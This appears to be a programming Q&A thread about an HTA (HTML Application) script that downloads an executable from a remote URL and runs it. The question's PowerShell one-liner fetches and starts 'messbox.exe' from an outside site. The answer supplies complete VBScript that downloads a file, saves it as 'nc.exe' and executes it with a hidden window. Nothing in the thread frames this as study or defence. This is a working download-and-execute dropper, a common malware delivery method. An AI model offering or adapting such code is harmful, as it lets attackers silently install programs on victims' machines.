# Download and Execute using HTA

Tags: javascript, html, hta

Am trying to download and open a file using hta.

I have tried the following code with no luck.

```
<script>
a=new ActiveXObject("WScript.Shell");
run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.greyhathacker.net/tools/messbox.exe','mess.exe');Start-Process 'mess.exe'",vbNormalFocus)
</script>
```

Can someone pls help with something nice
Thx.

I am getting the following error.
[Script Error Image](https://i.stack.imgur.com/TadtI.png)

When i click yes, it just shows a blank hta console.

Comment: can you provide any more information as to what is going wrong or what output you receive?

Comment: VB constants are not defined in JS.

Comment: Can u help define the VB Constant?

Answer (score 1):

Why not use a normal Get/Post request, save the file and then execute it?

```
dim http_obj
dim stream_obj
dim shell_obj

set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set Shell = CreateObject("shell.application") 

URL = "http://www.mikemurr.com/example.exe" 'Where to download the file from
FILENAME = "nc.exe" 'Name to save the file (on the local system)
Params = "-param1 -param2" 'Command to run after downloading

http_obj.open "GET", URL, False
http_obj.send

stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2

Shell.ShellExecute FILENAME , Params , "" , "" , 0
```

got most of the code from http://www.mikemurr.com/vbscript-download-and-execute-file/
with some alters as HTA is not pure vbscript.